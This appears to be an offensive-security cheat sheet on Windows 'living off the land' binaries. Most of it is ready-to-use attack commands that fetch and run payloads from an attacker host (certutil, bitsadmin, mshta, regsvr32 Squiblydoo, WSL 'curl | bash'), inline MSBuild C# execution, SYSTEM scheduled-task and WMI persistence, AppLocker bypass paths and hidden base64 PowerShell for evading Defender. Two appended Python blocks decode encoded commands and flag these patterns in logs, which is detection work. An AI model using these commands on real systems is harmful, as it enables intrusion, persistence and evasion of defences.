LOLBAS


Living Off the Land Binaries And Scripts. Windows ships with signed Microsoft binaries that can download, execute, persist, and bypass restrictions. The full catalog is at lolbas-project.github.io.

Why care: signed by Microsoft = passes AV signature checks, often allowed by AppLocker / WDAC, blends into legitimate admin behavior.

i. Download a file

certutil, the classic:

certutil -urlcache -split -f http://10.10.14.1/sh.exe C:\Windows\Temp\sh.exe
Sometimes flagged by Defender now; use -urlfetch for older boxes:

certutil -urlfetch http://10.10.14.1/sh.exe C:\Windows\Temp\sh.exe

bitsadmin:

bitsadmin /transfer job /download /priority high http://10.10.14.1/sh.exe C:\Windows\Temp\sh.exe

PowerShell (always available since Win7):

iwr http://10.10.14.1/sh.exe -OutFile C:\Windows\Temp\sh.exe
(New-Object Net.WebClient).DownloadFile('http://10.10.14.1/sh.exe','C:\Windows\Temp\sh.exe')

curl.exe (Win10 1803+):

curl http://10.10.14.1/sh.exe -o C:\Windows\Temp\sh.exe

MSHTA (downloads and runs HTA):

mshta http://10.10.14.1/sh.hta

regsvr32 (downloads and executes scriptlet):

regsvr32 /s /n /u /i:http://10.10.14.1/sh.sct scrobj.dll

xcopy / robocopy from SMB share:

xcopy \\10.10.14.1\share\sh.exe C:\Windows\Temp\ /Y

ii. Execute via signed binary

rundll32 with inline JScript via mshtml (no exe on disk, no script file extension):

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd /c calc")

regsvr32 (Squiblydoo):

regsvr32 /s /n /u /i:http://10.10.14.1/sh.sct scrobj.dll

mshta with inline VBScript/JScript:

mshta vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run ""cmd /c calc"", 0, True"))

InstallUtil (executes any .NET assembly’s Uninstall method):

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Temp\sh.exe

MSBuild (executes inline C# in an XML project file):

<!-- sh.csproj -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Hello"><ClassExample /></Target>
  <UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task><Code Type="Class" Language="cs">
      <![CDATA[
        using System; using System.Diagnostics; using Microsoft.Build.Utilities;
        public class ClassExample : Task, ITask {
          public override bool Execute() { Process.Start("cmd","/c calc"); return true; } }
      ]]>
    </Code></Task>
  </UsingTask>
</Project>
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe sh.csproj

This has been the #1 AppLocker/WDAC bypass for years: MSBuild compiles and runs the C# in memory.

iii. WMI execution (local)

wmic process call create "cmd.exe /c calc"

PowerShell:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd /c calc"

iv. Persistence via LOLBAS

Scheduled task that calls a LOLBin:

schtasks /create /tn updater /tr "regsvr32 /s /n /u /i:http://10.10.14.1/sh.sct scrobj.dll" /sc onlogon /ru SYSTEM

WMI event subscription:

$f = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name='X'; EventNameSpace='root\cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}
$c = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name='X'; CommandLineTemplate='cmd /c sh.exe'}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$f; Consumer=$c}

v. AppLocker / WDAC bypass

AppLocker default rules allow signed Microsoft binaries everywhere. AppLocker bypasses live in two categories:

Writable directories AppLocker allows by default:

  • C:\Windows\System32\spool\drivers\color\
  • C:\Windows\Tasks\
  • C:\Windows\Temp\ (sometimes)
  • C:\Windows\Tracing\
  • C:\Windows\System32\Tasks_Migrated\

Drop your unsigned binary here and AppLocker often allows execution.

Always-allowed signed LOLBins:

  • MSBuild.exe -> inline C# (see above)
  • InstallUtil.exe
  • regsvcs.exe / regasm.exe
  • mavinject.exe -> DLL injection
  • csi.exe (Roslyn C# REPL)
  • dnx.exe (older .NET)

WDAC (Windows Defender Application Control) is stricter. MSBuild and similar are often blocked in WDAC environments. Then you need:

  • Signed third-party binaries with known DLL hijacks
  • Trusted-installer-style techniques

vi. File transfer through signed channels

When network egress is restricted to MS endpoints only:

Office365 / Teams URLs (legitimate Microsoft):

  • Upload to a OneDrive or SharePoint you control, fetch via signed Edge/curl
  • Use Microsoft Graph API endpoints when you have a token

bits with custom server (less suspicious than raw HTTP):

bitsadmin /transfer mybits /priority high https://mscontent.example.com/payload.exe %temp%\payload.exe

vii. Common LOLBINS quick reference

Binary            Use case
certutil.exe      Download, base64 encode/decode
bitsadmin.exe     Download, persistence via job
regsvr32.exe      Execute remote scriptlets (Squiblydoo)
rundll32.exe      Execute DLL exports, JS via mshtml
mshta.exe         HTA execution from URL
wmic.exe          Process create, remote execution
schtasks.exe      Persistence, scheduled tasks
sc.exe            Service creation, persistence
msiexec.exe       Install MSI, can run from URL
installutil.exe   Execute .NET via Uninstall method
msbuild.exe       Inline C# execution, AppLocker bypass
forfiles.exe      Command execution wrapper
pcalua.exe        Program Compatibility Assistant, runs anything
diskshadow.exe    Script engine that runs commands
ftp.exe           File transfer, also runs scripts via -s:

Full list: lolbas-project.github.io - searchable by function (Execute, Download, Copy, etc.).

viii. Combining with Defender evasion

Almost every LOLBin is now signatured on its payload contents rather than on the binary itself. Hide the payload string by base64-encoding it, splitting it into pieces, or generating it at runtime:

powershell -nop -w hidden -enc <base64-of-iwr-and-iex>

See Defender & AMSI Evasion for AMSI bypass before any PowerShell-heavy execution.
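The decoding step a detection needs for the -enc trick above, as an added example that is not code from this page: it peels the base64/UTF-16LE layer (nested up to three deep, which goes beyond the single layer shown) and looks for cradle keywords in the decoded script. The accepted -e/-ec/-enc spellings, the keyword list and the constructed sample are assumptions.

```python
import base64
import re

# Added example, not part of this page or of any Microsoft tooling: peel the
# -enc/-EncodedCommand layer off a PowerShell command line (base64 of UTF-16LE
# text) so detection rules see the real script, not the base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
CRADLE_RE = re.compile(
    r"\b(iwr|invoke-webrequest|iex|invoke-expression|downloadstring|downloadfile|frombase64string)\b",
    re.IGNORECASE,
)

def decode_layer(b64):
    """Decode one -enc argument (base64 of UTF-16LE); None if it is not valid."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace") if len(raw) % 2 == 0 else None

def unwrap(command_line, max_depth=3):
    """Return decoded script layers, outermost first; nested -enc is peeled up to max_depth."""
    layers, current = [], command_line
    for _ in range(max_depth):
        m = ENC_RE.search(current)
        script = decode_layer(m.group(1)) if m else None
        if script is None:
            break
        layers.append(script)
        current = script
    return layers

def find_cradles(command_line):
    """Cradle keywords in the raw line and every decoded layer, de-duplicated in order."""
    hits = [k.lower() for t in [command_line] + unwrap(command_line) for k in CRADLE_RE.findall(t)]
    return list(dict.fromkeys(hits))

def encode_for_test(script):
    """Build a -enc argument the way powershell.exe expects it (constructed test input)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample: the cradle from section viii, wrapped twice (double encoding).
INNER = "iwr http://10.10.14.1/sh.ps1 | iex"
OUTER = "powershell -nop -w hidden -enc " + encode_for_test(INNER)
SAMPLE = "powershell -nop -w hidden -enc " + encode_for_test(OUTER)
```

Feed `find_cradles` the CommandLine field of Sysmon Event ID 1 or Security 4688 records; a hit on a decoded layer is the signal the raw blob hides.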

ix. WSL as a LOLBIN

When the box has WSL installed, you get a full Linux environment that bypasses most Windows EDR:

wsl --list
wsl bash -c "curl http://10.10.14.1/sh.sh | bash"

Some EDRs monitor WSL; most do not.
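Detection-side counterpart to the download, execute, WMI, persistence and WSL sections above, as an added example that is not code from this page or from the LOLBAS project: it parses constructed Sysmon-style process-creation records and flags command lines matching the patterns shown. The record format, rule names and sample log lines are assumptions.

```python
import re

# Added detection example (not from the LOLBAS project or this page): flags
# process-creation command lines (Sysmon EID 1 / Security 4688) that match the
# LOLBin patterns above. The command line is only matched, never executed.
RULES = [  # (rule name, pattern applied case-insensitively to the command line)
    ("certutil download",   r"\bcertutil(\.exe)?\b.*-url(cache|fetch)\b.*https?://"),
    ("bitsadmin download",  r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://"),
    ("powershell cradle",   r"\b(iwr|invoke-webrequest|downloadfile|downloadstring)\b"),
    ("regsvr32 squiblydoo", r"\bregsvr32(\.exe)?\b.*/i:https?://.*\bscrobj\.dll\b"),
    ("mshta remote/inline", r"\bmshta(\.exe)?\s+(https?://|vbscript:|javascript:)"),
    ("rundll32 javascript", r"\brundll32(\.exe)?\s+javascript:"),
    ("installutil /u",      r"\binstallutil(\.exe)?\b.*\s/u\b"),
    ("msbuild project",     r"\bmsbuild(\.exe)?\b.*\.(csproj|proj|xml)\b"),
    ("wmic process create", r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b"),
    ("schtasks lolbin",     r"\bschtasks(\.exe)?\b.*/tr\b.*\b(regsvr32|mshta|rundll32|certutil|bitsadmin|msbuild)\b"),
    ("wsl shell",           r"\bwsl(\.exe)?\b.*\b(bash|sh)\s+-c\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]

# Simplified Sysmon-style record (constructed format): key=value pairs, CommandLine quoted last.
LINE_RE = re.compile(r'^EventID=(\d+)\s+Image=(\S+)\s+CommandLine="(.*)"$')

def parse_line(line):
    """Return (event_id, image, command_line), or None if the line does not parse."""
    m = LINE_RE.match(line.strip())
    return (int(m.group(1)), m.group(2), m.group(3)) if m else None

def classify(command_line):
    """Return the names of every rule the command line matches, in RULES order."""
    return [name for name, rx in COMPILED if rx.search(command_line)]

def scan(log_text):
    """Return [(line_no, image, [rule names])] for every flagged process-creation event."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        names = classify(rec[2]) if rec and rec[0] == 1 else []
        if names:
            hits.append((n, rec[1], names))
    return hits

# Constructed sample log; the -hashfile line is benign certutil use and must not fire.
SAMPLE_LOG = r'''
EventID=1 Image=C:\Windows\System32\certutil.exe CommandLine="certutil -urlcache -split -f http://10.10.14.1/sh.exe C:\Windows\Temp\sh.exe"
EventID=1 Image=C:\Windows\System32\regsvr32.exe CommandLine="regsvr32 /s /n /u /i:http://10.10.14.1/sh.sct scrobj.dll"
EventID=1 Image=C:\Windows\System32\certutil.exe CommandLine="certutil -hashfile C:\setup.msi SHA256"
EventID=1 Image=C:\Windows\System32\schtasks.exe CommandLine="schtasks /create /tn updater /tr \"regsvr32 /s /n /u /i:http://10.10.14.1/sh.sct scrobj.dll\" /sc onlogon /ru SYSTEM"
EventID=1 Image=C:\Windows\System32\wsl.exe CommandLine="wsl bash -c \"curl http://10.10.14.1/sh.sh | bash\""
'''.strip()
```

Each hit carries every rule it matched, so the scheduled task above is reported both as a LOLBin task and as Squiblydoo, which is the pairing a triage analyst wants to see.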